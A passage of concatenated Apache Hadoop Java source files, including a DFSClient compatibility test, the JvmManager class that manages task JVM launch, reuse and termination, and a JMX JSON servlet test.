return cluster.getDataNode(ipcport);
}
}
<|start_filename|>src/test/org/apache/hadoop/hdfs/TestDfsClientCreateParentCompatibility.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.fail;
import static org.mockito.Matchers.anyBoolean;
import static org.mockito.Matchers.anyLong;
import static org.mockito.Matchers.anyObject;
import static org.mockito.Matchers.anyShort;
import static org.mockito.Matchers.eq;
import static org.mockito.Mockito.doAnswer;
import static org.mockito.Mockito.doThrow;
import static org.mockito.Mockito.mock;
import java.io.IOException;
import java.util.Arrays;
import java.util.concurrent.atomic.AtomicInteger;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.hdfs.server.namenode.NameNode;
import org.apache.hadoop.ipc.RemoteException;
import org.junit.Test;
import org.mockito.invocation.InvocationOnMock;
import org.mockito.stubbing.Answer;
/**
* This tests verifies that new DFSClients handle exceptions that would be
* thrown by older NameNodes (pre cdh3u3, pre apache 0.21).
*
* This is a CDH3 specific backwards compatibility test.
*/
public class TestDfsClientCreateParentCompatibility {
public static final Log LOG = LogFactory
.getLog(TestDfsClientCreateParentCompatibility.class);
@Test
public void testCreateWithoutDirsCompatibility() throws IOException {
Configuration conf = new Configuration();
NameNode nn = mock(NameNode.class);
final String err =
"java.io.IOException: " +
"java.lang.NoSuchMethodException: org.apache.hadoop.hdfs." +
"protocol.ClientProtocol.create(java.lang.String, " +
"org.apache.hadoop.fs.permission.FsPermission, " +
"java.lang.String, boolean, boolean, short, long)";
final AtomicInteger newCount = new AtomicInteger();
Answer<Void> newCallCounter = new Answer<Void>() {
@Override
public Void answer(InvocationOnMock invocation) throws Throwable {
LOG.info("New Call "+ Arrays.toString(invocation.getArguments()));
newCount.incrementAndGet();
throw new RemoteException(IOException.class.getName(), err);
}
};
final AtomicInteger oldCount = new AtomicInteger();
Answer<Void> oldCallCounter = new Answer<Void>() {
@Override
public Void answer(InvocationOnMock invocation) throws Throwable {
LOG.info("Old Call "+ Arrays.toString(invocation.getArguments()));
oldCount.incrementAndGet();
return null;
}
};
// new api client call
doAnswer(newCallCounter).when(nn)
.create((String)anyObject(), (FsPermission)anyObject(),
(String)anyObject(), anyBoolean(), eq(false), anyShort(), anyLong());
// old api client call
doAnswer(oldCallCounter).when(nn)
.create((String)anyObject(), (FsPermission)anyObject(),
(String)anyObject(), anyBoolean(), anyShort(), anyLong());
DFSClient client = new DFSClient(null, nn, conf, null);
boolean createParent = false;
client.create("foo", null, false, createParent, (short) 1, 512, null, 512);
client.create("bar", null, false, createParent, (short) 1, 512, null, 512);
client.create("baz", null, false, createParent, (short) 1, 512, null, 512);
// no exception was thrown, three calls to the old verison.
assertEquals(3, oldCount.get());
assertEquals(1, newCount.get());
}
@Test(expected=IOException.class)
public void testCreateWithException() throws IOException {
Configuration conf = new Configuration();
NameNode nn = mock(NameNode.class);
// new api client call
Exception e = new RemoteException(IOException.class.getName(),
"Other remote exception");
doThrow(e).when(nn)
.create((String)anyObject(), (FsPermission)anyObject(),
(String)anyObject(), anyBoolean(), eq(false), anyShort(), anyLong());
DFSClient client = new DFSClient(null, nn, conf, null);
boolean createParent = false;
client.create("foo", null, false, createParent, (short) 1, 512, null, 512);
fail("Expected an IOException");
}
/**
* Small testing program that attemps to call createNonRecursive.
*/
public static void main(String argv[]) throws IOException {
Configuration conf = new Configuration();
FileSystem fs = FileSystem.get(conf);
Path p = new Path(argv[0]);
FSDataOutputStream out = fs.createNonRecursive(p, true, 512, (short) 1,
512, null);
out.close();
fs.close();
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/JvmManager.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.io.File;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Random;
import java.util.Vector;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.concurrent.locks.ReentrantLock;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.LocalDirAllocator;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.mapred.CleanupQueue.PathDeletionContext;
import org.apache.hadoop.mapred.TaskTracker.TaskInProgress;
import org.apache.hadoop.mapreduce.TaskType;
import org.apache.hadoop.mapreduce.server.tasktracker.JVMInfo;
import org.apache.hadoop.mapreduce.server.tasktracker.userlogs.JvmFinishedEvent;
import org.apache.hadoop.security.UserGroupInformation;
import org.apache.hadoop.util.ProcessTree;
import org.apache.hadoop.util.StringUtils;
import org.apache.hadoop.util.ProcessTree.Signal;
import org.apache.hadoop.util.Shell.ShellCommandExecutor;
class JvmManager {
public static final Log LOG = LogFactory
.getLog("org.apache.hadoop.mapred.JvmManager");
private JvmManagerForType mapJvmManager;
private JvmManagerForType reduceJvmManager;
public JvmEnv constructJvmEnv(List<String> setup, Vector<String> vargs,
File stdout, File stderr, long logSize, File workDir, JobConf conf) {
return new JvmEnv(setup, vargs, stdout, stderr, logSize, workDir, conf);
}
public JvmManager(TaskTracker tracker) throws IOException {
mapJvmManager = new JvmManagerForType(tracker.getMaxCurrentMapTasks(),
true, tracker);
reduceJvmManager = new JvmManagerForType(
tracker.getMaxCurrentReduceTasks(), false, tracker);
}
// called from unit tests
JvmManagerForType getJvmManagerForType(TaskType type) {
if (type.equals(TaskType.MAP)) {
return mapJvmManager;
} else if (type.equals(TaskType.REDUCE)) {
return reduceJvmManager;
}
return null;
}
/*
* Saves pid of the given taskJvm
*/
void setPidToJvm(JVMId jvmId, String pid) {
if (jvmId.isMapJVM()) {
mapJvmManager.jvmIdToPid.put(jvmId, pid);
} else {
reduceJvmManager.jvmIdToPid.put(jvmId, pid);
}
}
/*
* Returns the pid of the task
*/
String getPid(TaskRunner t) {
if (t != null && t.getTask() != null) {
if (t.getTask().isMapTask()) {
JVMId id = mapJvmManager.runningTaskToJvm.get(t);
if (id != null) {
return mapJvmManager.jvmIdToPid.get(id);
}
} else {
JVMId id = reduceJvmManager.runningTaskToJvm.get(t);
if (id != null) {
return reduceJvmManager.jvmIdToPid.get(id);
}
}
}
return null;
}
public void stop() throws IOException, InterruptedException {
mapJvmManager.stop();
reduceJvmManager.stop();
}
public boolean isJvmKnown(JVMId jvmId) {
if (jvmId.isMapJVM()) {
return mapJvmManager.isJvmknown(jvmId);
} else {
return reduceJvmManager.isJvmknown(jvmId);
}
}
public void launchJvm(TaskRunner t, JvmEnv env) throws IOException,
InterruptedException {
if (t.getTask().isMapTask()) {
mapJvmManager.reapJvm(t, env);
} else {
reduceJvmManager.reapJvm(t, env);
}
}
public boolean validateTipToJvm(TaskInProgress tip, JVMId jvmId) {
if (jvmId.isMapJVM()) {
return mapJvmManager.validateTipToJvm(tip, jvmId);
} else {
return reduceJvmManager.validateTipToJvm(tip, jvmId);
}
}
public TaskInProgress getTaskForJvm(JVMId jvmId) throws IOException {
if (jvmId.isMapJVM()) {
return mapJvmManager.getTaskForJvm(jvmId);
} else {
return reduceJvmManager.getTaskForJvm(jvmId);
}
}
public void taskFinished(TaskRunner tr) {
if (tr.getTask().isMapTask()) {
mapJvmManager.taskFinished(tr);
} else {
reduceJvmManager.taskFinished(tr);
}
}
public void taskKilled(TaskRunner tr) throws IOException,
InterruptedException {
if (tr.getTask().isMapTask()) {
mapJvmManager.taskKilled(tr);
} else {
reduceJvmManager.taskKilled(tr);
}
}
public void killJvm(JVMId jvmId) throws IOException, InterruptedException {
if (jvmId.isMap) {
mapJvmManager.killJvm(jvmId);
} else {
reduceJvmManager.killJvm(jvmId);
}
}
/**
* Adds the task's work dir to the cleanup queue of taskTracker for
* asynchronous deletion of work dir.
*
* @param tracker
* taskTracker
* @param task
* the task whose work dir needs to be deleted
*/
static void deleteWorkDir(TaskTracker tracker, Task task) {
String user = task.getUser();
String jobid = task.getJobID().toString();
String taskid = task.getTaskID().toString();
String workDir = TaskTracker.getTaskWorkDir(user, jobid, taskid,
task.isTaskCleanupTask());
String userDir = TaskTracker.getUserDir(user);
tracker.getCleanupThread().addToQueue(
new TaskController.DeletionContext(tracker.getTaskController(),
false, user, workDir.substring(userDir.length())));
}
static class JvmManagerForType {
// Mapping from the JVM IDs to running Tasks
Map<JVMId, TaskRunner> jvmToRunningTask = new HashMap<JVMId, TaskRunner>();
// Mapping from the tasks to JVM IDs
Map<TaskRunner, JVMId> runningTaskToJvm = new HashMap<TaskRunner, JVMId>();
// Mapping from the JVM IDs to Reduce JVM processes
Map<JVMId, JvmRunner> jvmIdToRunner = new HashMap<JVMId, JvmRunner>();
// Mapping from the JVM IDs to process IDs
Map<JVMId, String> jvmIdToPid = new HashMap<JVMId, String>();
private static String SYSTEM_PATH_SEPARATOR = System
.getProperty("path.separator");
AtomicInteger currentJvmId = new AtomicInteger(0);
LocalDirAllocator lDirAllocator = new LocalDirAllocator(
"mapred.local.dir");
int maxJvms;
boolean isMap;
private final long sleeptimeBeforeSigkill;
Random rand = new Random(System.currentTimeMillis());
static final String DELAY_BEFORE_KILL_KEY = "mapred.tasktracker.tasks.sleeptime-before-sigkill";
// number of milliseconds to wait between TERM and KILL.
private static final long DEFAULT_SLEEPTIME_BEFORE_SIGKILL = 250;
private TaskTracker tracker;
public JvmManagerForType(int maxJvms, boolean isMap, TaskTracker tracker)
throws IOException {
this.maxJvms = maxJvms;
this.isMap = isMap;
this.tracker = tracker;
sleeptimeBeforeSigkill = tracker.getJobConf().getLong(
DELAY_BEFORE_KILL_KEY, DEFAULT_SLEEPTIME_BEFORE_SIGKILL);
launchJvms();
}
private void launchJvms() throws IOException {
for (int i = 0; i < maxJvms; ++i) {
launchJvmWithNoTask(currentJvmId.getAndIncrement());
}
}
private void launchJvmWithNoTask(int i) throws IOException {
JVMId jvmId = new JVMId(isMap, i);
JvmEnv env = getDefaultJvmEnv(jvmId);
JvmRunner jvmRunner = new JvmRunner(env, jvmId);
jvmRunner.setDaemon(true);
jvmRunner.setName("JVM Runner " + jvmRunner.jvmId + " spawned.");
jvmIdToRunner.put(jvmId, jvmRunner);
LOG.info(jvmRunner.getName());
jvmRunner.start();
}
private void launchJvmWithTask(int i, TaskRunner t) throws IOException {
JVMId jvmId = new JVMId(isMap, i);
JvmEnv env = getDefaultJvmEnv(jvmId);
JvmRunner jvmRunner = new JvmRunner(env, jvmId);
jvmRunner.setDaemon(true);
jvmIdToRunner.put(jvmId, jvmRunner);
this.setRunningTaskForJvm(jvmId, t);
jvmRunner.setName("JVM Runner " + jvmRunner.jvmId + " spawned.");
LOG.info(jvmRunner.getName());
jvmRunner.start();
}
private JvmEnv getDefaultJvmEnv(JVMId id) throws IOException {
JobConf conf = tracker.getJobConf();
String jvmSubDir = TaskTracker.SUBDIR + Path.SEPARATOR + id;
Path jvmDir = lDirAllocator.getLocalPathForWrite(jvmSubDir,
tracker.getJobConf());
Path workDir = new Path(jvmDir, "work");
Path logDir = new Path(jvmDir, "log");
FileSystem localFS = FileSystem.getLocal(conf);
if (localFS.exists(jvmDir) == false) {
localFS.mkdirs(jvmDir);
localFS.mkdirs(workDir);
localFS.mkdirs(logDir);
}
List<String> setupCmds = getSetupCmds(workDir, logDir);
Vector<String> vmArgs = getVMArgs(new File(workDir.toString()),
logDir, conf);
Path stdout = new Path(logDir, TaskLog.LogName.STDOUT.toString());
Path stderr = new Path(logDir, TaskLog.LogName.STDERR.toString());
return new JvmEnv(setupCmds, vmArgs, new File(stdout.toString()),
new File(stderr.toString()),
TaskLog.getTaskLogLength(conf),
new File(workDir.toString()), conf);
}
private Vector<String> getVMArgs(File workDir, Path logDir, JobConf conf)
throws IOException {
Path logFileName = new Path(logDir,
TaskLog.LogName.SYSLOG.toString());
List<String> classPaths = TaskRunner.getClassPaths(conf, new File(
workDir.toString()), null);
long logSize = TaskLog.getTaskLogLength(conf);
// java
Vector<String> vmArgs = new Vector<String>();
File jvm = new File(
new File(System.getProperty("java.home"), "bin"), "java");
vmArgs.add(jvm.toString());
// child opts
String childOptStr = conf.get(JobConf.MAPRED_TASK_JAVA_OPTS,
JobConf.DEFAULT_MAPRED_TASK_JAVA_OPTS);
String javaOptsSplit[] = childOptStr.trim().split("\\s+");
String libraryPath = System.getProperty("java.library.path");
if (libraryPath == null) {
libraryPath = workDir.getAbsolutePath();
} else {
libraryPath += SYSTEM_PATH_SEPARATOR + workDir;
}
boolean hasUserLDPath = false;
for (int i = 0; i < javaOptsSplit.length; i++) {
if (javaOptsSplit[i].startsWith("-Djava.library.path=")) {
javaOptsSplit[i] += SYSTEM_PATH_SEPARATOR + libraryPath;
hasUserLDPath = true;
break;
}
}
if (!hasUserLDPath) {
vmArgs.add("-Djava.library.path=" + libraryPath);
}
for (int i = 0; i < javaOptsSplit.length; i++) {
vmArgs.add(javaOptsSplit[i]);
}
String tmp = conf.get("mapred.child.tmp", "./tmp");
Path tmpDir = new Path(tmp);
if (!tmpDir.isAbsolute()) {
tmpDir = new Path(workDir.toString(), tmpDir);
}
// Add classpath.
vmArgs.add("-classpath");
String classPath = StringUtils.join(SYSTEM_PATH_SEPARATOR,
classPaths);
vmArgs.add(classPath);
vmArgs.add("-Djava.io.tmpdir=" + tmpDir);
vmArgs.add("-Dhadoop.log.dir="
+ new File(System.getProperty("hadoop.log.dir"))
.getAbsolutePath());
vmArgs.add("-Dhadoop.root.logger=INFO,TLA");
vmArgs.add("-D" + TaskLogAppender.LOGSIZE_PROPERTY + "=" + logSize);
vmArgs.add("-D" + TaskLogAppender.LOG_FILE_NAME + "=" + logFileName);
vmArgs.add(Child.class.getName()); // main of Child
// pass umbilical address
InetSocketAddress address = tracker.getTaskTrackerReportAddress();
vmArgs.add(address.getAddress().getHostAddress());
vmArgs.add(Integer.toString(address.getPort()));
vmArgs.add(this.isMap ? "1" : "0"); // pass task identifier
// pass task log location
vmArgs.add(logDir.toString());
return vmArgs;
}
private List<String> getSetupCmds(Path workDir, Path logDir) {
List<String> setupCmds = new ArrayList<String>();
Map<String, String> env = new HashMap<String, String>();
// HADOOP_WORK_DIR
env.put(TaskRunner.HADOOP_WORK_DIR, workDir.toString());
// LD_LIBRARY_PATH
StringBuffer ldLibraryPath = new StringBuffer();
ldLibraryPath.append(workDir.toString());
String oldLdLibraryPath = null;
oldLdLibraryPath = System.getenv("LD_LIBRARY_PATH");
if (oldLdLibraryPath != null) {
ldLibraryPath.append(Path.SEPARATOR);
ldLibraryPath.append(oldLdLibraryPath);
}
env.put("LD_LIBRARY_PATH", ldLibraryPath.toString());
// HADOOP_ROOT_LOGGER
env.put("HADOOP_ROOT_LOGGER", "INFO,TLA");
TaskRunner.appendEnvExports(setupCmds, env);
return setupCmds;
}
public synchronized void setRunningTaskForJvm(JVMId jvmId, TaskRunner t) {
JvmRunner jvmRunner = jvmIdToRunner.get(jvmId);
synchronized (jvmRunner) {
jvmToRunningTask.put(jvmId, t);
runningTaskToJvm.put(t, jvmId);
jvmIdToRunner.get(jvmId).setBusy(true);
jvmRunner.notify();
}
}
public synchronized boolean validateTipToJvm(TaskInProgress tip, JVMId jvmId) {
if (jvmId == null) {
LOG.warn("Null jvmId. Cannot verify Jvm. validateTipToJvm returning false");
return false;
}
TaskRunner taskRunner = jvmToRunningTask.get(jvmId);
if (taskRunner == null) {
return false; // JvmId not known.
}
TaskInProgress knownTip = taskRunner.getTaskInProgress();
if (knownTip == tip) { // Valid to compare the addresses ? (or
// equals)
return true;
} else {
return false;
}
}
public TaskInProgress getTaskForJvmNoWait(JVMId jvmId) {
if (jvmToRunningTask.containsKey(jvmId)) {
// Incase of JVM reuse, tasks are returned to previously
// launched
// JVM via this method. However when a new task is launched
// the task being returned has to be initialized.
TaskRunner taskRunner = jvmToRunningTask.get(jvmId);
JvmRunner jvmRunner = jvmIdToRunner.get(jvmId);
if(jvmRunner == null)
return null;
Task task = taskRunner.getTaskInProgress().getTask();
jvmRunner.taskGiven(task);
return taskRunner.getTaskInProgress();
} else {
return null;
}
}
public TaskInProgress getTaskForJvm(JVMId jvmId) throws IOException {
TaskInProgress result = null;
JvmRunner jvmRunner = null;
synchronized(this) {
jvmRunner = jvmIdToRunner.get(jvmId);
if (jvmRunner == null) {
LOG.error("Cannot find jvm runner with jvmid " + jvmId);
return null;
}
result = getTaskForJvmNoWait(jvmId);
}
if(result != null)
return result;
else {
synchronized (jvmRunner) {
try {
jvmRunner.wait(3000);
} catch(Exception e) {
return null;
}
}
synchronized(this) {
jvmRunner = jvmIdToRunner.get(jvmId);
if (jvmRunner == null) {
return null;
}
return getTaskForJvmNoWait(jvmId);
}
}
}
public synchronized boolean isJvmknown(JVMId jvmId) {
boolean result = jvmIdToRunner.containsKey(jvmId);
return result;
}
public synchronized void taskFinished(TaskRunner tr) {
JVMId jvmId = runningTaskToJvm.remove(tr);
if (jvmId != null) {
jvmToRunningTask.remove(jvmId);
JvmRunner jvmRunner;
if ((jvmRunner = jvmIdToRunner.get(jvmId)) != null) {
jvmRunner.taskRan();
}
}
}
public synchronized void taskKilled(TaskRunner tr) throws IOException,
InterruptedException {
JVMId jvmId = runningTaskToJvm.remove(tr);
if (jvmId != null) {
jvmToRunningTask.remove(jvmId);
killJvm(jvmId);
}
}
public synchronized void killJvm(JVMId jvmId) throws IOException,
InterruptedException {
JvmRunner jvmRunner;
if ((jvmRunner = jvmIdToRunner.get(jvmId)) != null) {
killJvmRunner(jvmRunner);
}
}
public synchronized void stop() throws IOException, InterruptedException {
// since the kill() method invoked later on would remove
// an entry from the jvmIdToRunner map, we create a
// copy of the values and iterate over it (if we don't
// make a copy, we will encounter concurrentModification
// exception
List<JvmRunner> list = new ArrayList<JvmRunner>();
list.addAll(jvmIdToRunner.values());
for (JvmRunner jvm : list) {
killJvmRunner(jvm);
}
}
private synchronized void killJvmRunner(JvmRunner jvmRunner) throws IOException,
InterruptedException {
jvmRunner.kill();
removeJvm(jvmRunner.jvmId);
}
private synchronized void removeJvm(JVMId jvmId) {
jvmIdToRunner.remove(jvmId);
jvmIdToPid.remove(jvmId);
}
private synchronized void reapJvm(TaskRunner t, JvmEnv env) throws IOException,
InterruptedException {
if (t.getTaskInProgress().wasKilled()) {
// the task was killed in-flight
// no need to do the rest of the operations
return;
}
boolean spawnNewJvm = false;
JobID jobId = t.getTask().getJobID();
// Check whether there is a free slot to start a new JVM.
// ,or, Kill a (idle) JVM and launch a new one
// When this method is called, we *must*
// (1) spawn a new JVM (if we are below the max)
// (2) find an idle JVM (that belongs to the same job), or,
// (3) kill an idle JVM (from a different job)
// (the order of return is in the order above)
int numJvmsSpawned = jvmIdToRunner.size();
if (numJvmsSpawned >= maxJvms) {
// go through the list of JVMs for all jobs.
Iterator<Map.Entry<JVMId, JvmRunner>> jvmIter = jvmIdToRunner
.entrySet().iterator();
while (jvmIter.hasNext()) {
JvmRunner jvmRunner = jvmIter.next().getValue();
// look for a free JVM for this job; if one exists then
// just break
if (!jvmRunner.isBusy()) {
setRunningTaskForJvm(jvmRunner.jvmId, t); // reserve
// the
// JVM
LOG.info("No new JVM spawned for jobId/taskid: "
+ jobId + "/" + t.getTask().getTaskID()
+ ". Attempting to reuse: "
+ jvmRunner.jvmId);
return;
}
}
} else {
spawnNewJvm = true;
}
if (spawnNewJvm) {
spawnNewJvm(jobId, env, t);
return;
}
// *MUST* never reach this
LOG.fatal("Inconsistent state!!! "
+ "JVM Manager reached an unstable state "
+ "while reaping a JVM for task: "
+ t.getTask().getTaskID() + " " + getDetails()
+ ". Aborting. ");
System.exit(-1);
}
private String getDetails() {
StringBuffer details = new StringBuffer();
details.append("Number of active JVMs:").append(
jvmIdToRunner.size());
Iterator<JVMId> jvmIter = jvmIdToRunner.keySet().iterator();
while (jvmIter.hasNext()) {
JVMId jvmId = jvmIter.next();
details.append("\n JVMId ")
.append(jvmId.toString())
.append(" #Tasks ran: ")
.append(jvmIdToRunner.get(jvmId).numTasksRan)
.append(" Currently busy? ")
.append(jvmIdToRunner.get(jvmId).busy)
.append(" Currently running: ")
.append(jvmToRunningTask.get(jvmId).getTask()
.getTaskID().toString());
}
return details.toString();
}
private void spawnNewJvm(JobID jobId, JvmEnv env, TaskRunner t)
throws IOException {
this.launchJvmWithTask(currentJvmId.getAndIncrement(), t);
}
private synchronized void updateOnJvmExit(JVMId jvmId, int exitCode) {
removeJvm(jvmId);
TaskRunner t = jvmToRunningTask.remove(jvmId);
if (t != null) {
runningTaskToJvm.remove(t);
if (exitCode != 0) {
t.setExitCode(exitCode);
}
t.signalDone();
}
}
class JvmRunner extends Thread {
JvmEnv env;
volatile boolean killed = false;
volatile int numTasksRan;
final int numTasksToRun;
JVMId jvmId;
volatile boolean busy = true;
private ShellCommandExecutor shexec; // shell terminal for running
// the task
private Task firstTask;
private List<Task> tasksGiven = new ArrayList<Task>();
void taskGiven(Task task) {
tasksGiven.add(task);
}
public JvmRunner(JvmEnv env, JVMId jvmId) {
this.env = env;
numTasksToRun = 0;
this.jvmId = jvmId;
this.firstTask = null;
this.busy = false;
}
public JvmRunner(JvmEnv env, JobID jobId, Task firstTask) {
this.env = env;
this.jvmId = new JVMId(isMap, rand.nextInt());
this.numTasksToRun = env.conf.getNumTasksToExecutePerJvm();
this.firstTask = firstTask;
LOG.info("In JvmRunner constructed JVM ID: " + jvmId);
}
@Override
public void run() {
try {
runChild(env);
} catch (InterruptedException ie) {
return;
} catch (IOException e) {
LOG.warn("Caught IOException in JVMRunner", e);
} catch (Throwable e) {
LOG.error(
"Caught Throwable in JVMRunner. Aborting TaskTracker.",
e);
System.exit(1);
} finally {
jvmFinished();
}
}
public void runChild(JvmEnv env) throws IOException,
InterruptedException {
int exitCode = 0;
try {
env.vargs.add(Integer.toString(jvmId.getId()));
String user = UserGroupInformation.getCurrentUser()
.getUserName();
exitCode = tracker.getTaskController().launchTask(user,
null, null, env.setup, env.vargs, env.workDir,
env.stdout.toString(), env.stderr.toString());
} catch (IOException ioe) {
// do nothing
// error and output are appropriately redirected
} finally { // handle the exit code
// although the process has exited before we get here,
// make sure the entire process group has also been killed.
kill();
updateOnJvmExit(jvmId, exitCode);
LOG.info("JVM : " + jvmId + " exited with exit code "
+ exitCode + ". Number of tasks it ran: "
+ numTasksRan);
FileUtil.fullyDelete(env.workDir);
}
}
private class DelayedProcessKiller extends Thread {
private final String user;
private final int pid;
private final long delay;
private final Signal signal;
DelayedProcessKiller(String user, int pid, long delay,
Signal signal) {
this.user = user;
this.pid = pid;
this.delay = delay;
this.signal = signal;
setName("Task killer for " + pid);
setDaemon(false);
}
@Override
public void run() {
try {
Thread.sleep(delay);
tracker.getTaskController().signalTask(user, pid,
signal);
} catch (InterruptedException e) {
return;
} catch (IOException e) {
LOG.warn("Exception when killing task " + pid, e);
}
}
}
synchronized void kill() throws IOException, InterruptedException {
if (!killed) {
TaskController controller = tracker.getTaskController();
// Check inital context before issuing a kill to prevent
// situations
// where kill is issued before task is launched.
String pidStr = jvmIdToPid.get(jvmId);
if (pidStr != null) {
String user = env.conf.getUser();
int pid = Integer.parseInt(pidStr);
// start a thread that will kill the process dead
if (sleeptimeBeforeSigkill > 0) {
new DelayedProcessKiller(user, pid,
sleeptimeBeforeSigkill, Signal.KILL)
.start();
controller.signalTask(user, pid, Signal.TERM);
} else {
controller.signalTask(user, pid, Signal.KILL);
}
} else {
LOG.info(String.format(
"JVM Not killed %s but just removed",
jvmId.toString()));
}
killed = true;
}
}
// Post-JVM-exit logs processing. inform user log manager
private void jvmFinished() {
JvmFinishedEvent jfe = new JvmFinishedEvent(new JVMInfo(
TaskLog.getAttemptDir(firstTask.getTaskID(),
firstTask.isTaskCleanupTask()), tasksGiven));
tracker.getUserLogManager().addLogEvent(jfe);
}
public void taskRan() {
busy = false;
numTasksRan++;
}
public boolean ranAll() {
return (numTasksRan == numTasksToRun);
}
public void setBusy(boolean busy) {
this.busy = busy;
}
public boolean isBusy() {
return busy;
}
}
}
static class JvmEnv { // Helper class
List<String> vargs;
List<String> setup;
File stdout;
File stderr;
File workDir;
long logSize;
JobConf conf;
Map<String, String> env;
public JvmEnv(List<String> setup, Vector<String> vargs, File stdout,
File stderr, long logSize, File workDir, JobConf conf) {
this.setup = setup;
this.vargs = vargs;
this.stdout = stdout;
this.stderr = stderr;
this.workDir = workDir;
this.conf = conf;
}
}
}
<|start_filename|>src/test/org/apache/hadoop/jmx/TestJMXJsonServlet.java<|end_filename|>
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.jmx;
import static org.junit.Assert.*;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.http.HttpServer;
import org.junit.AfterClass;
import org.junit.BeforeClass;
import org.junit.Test;
public class TestJMXJsonServlet {
private static final Log LOG = LogFactory.getLog(TestJMXJsonServlet.class);
private static HttpServer server;
private static URL baseUrl;
private String readOutput(URL url) throws IOException {
StringBuilder out = new StringBuilder();
InputStream in = url.openConnection().getInputStream();
byte[] buffer = new byte[64 * 1024];
int len = in.read(buffer);
while (len > 0) {
out.append(new String(buffer, 0, len));
len = in.read(buffer);
}
return out.toString();
}
@BeforeClass public static void setup() throws Exception {
new File(System.getProperty("build.webapps", "build/webapps") + "/test"
).mkdirs();
server = new HttpServer("test", "0.0.0.0", 0, true);
server.start();
int port = server.getPort();
baseUrl = new URL("http://localhost:" + port + "/");
}
@AfterClass public static void cleanup() throws Exception {
server.stop();
}
public static void assertReFind(String re, String value) {
Pattern p = Pattern.compile(re);
Matcher m = p.matcher(value);
assertTrue("'"+p+"' does not match "+value, m.find());
}
@Test public void testQury() throws Exception {
String result = readOutput(new URL(baseUrl, "/jmx?qry=java.lang:type=Runtime"));
LOG.info("/jmx?qry=java.lang:type=Runtime RESULT: "+result);
assertReFind("\"name\"\\s*:\\s*\"java.lang:type=Runtime\"", result);
assertReFind("\"modelerType\"", result);
result = readOutput(new URL(baseUrl, "/jmx?qry=java.lang:type=Memory"));
LOG.info("/jmx?qry=java.lang:type=Memory RESULT: "+result);
assertReFind("\"name\"\\s*:\\s*\"java.lang:type=Memory\"", result);
assertReFind("\"modelerType\"", result);
result = readOutput(new URL(baseUrl, "/jmx"));
LOG.info("/jmx RESULT: "+result);
assertReFind("\"name\"\\s*:\\s*\"java.lang:type=Memory\"", result);
// test to get an attribute of a mbean
result = readOutput(new URL(baseUrl,
"/jmx?get=java.lang:type=Memory::HeapMemoryUsage"));
LOG.info("/jmx RESULT: "+result);
assertReFind("\"name\"\\s*:\\s*\"java.lang:type=Memory\"", result);
assertReFind("\"committed\"\\s*:", result);
// negative test to get an attribute of a mbean
result = readOutput(new URL(baseUrl,
"/jmx?get=java.lang:type=Memory::"));
LOG.info("/jmx RESULT: "+result);
assertReFind("\"ERROR\"", result);
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/task/reduce/EventFetcher.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred.task.reduce;
import java.io.IOException;
import java.net.URI;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.mapred.JvmContext;
import org.apache.hadoop.mapred.MapTaskCompletionEventsUpdate;
import org.apache.hadoop.mapred.TaskCompletionEvent;
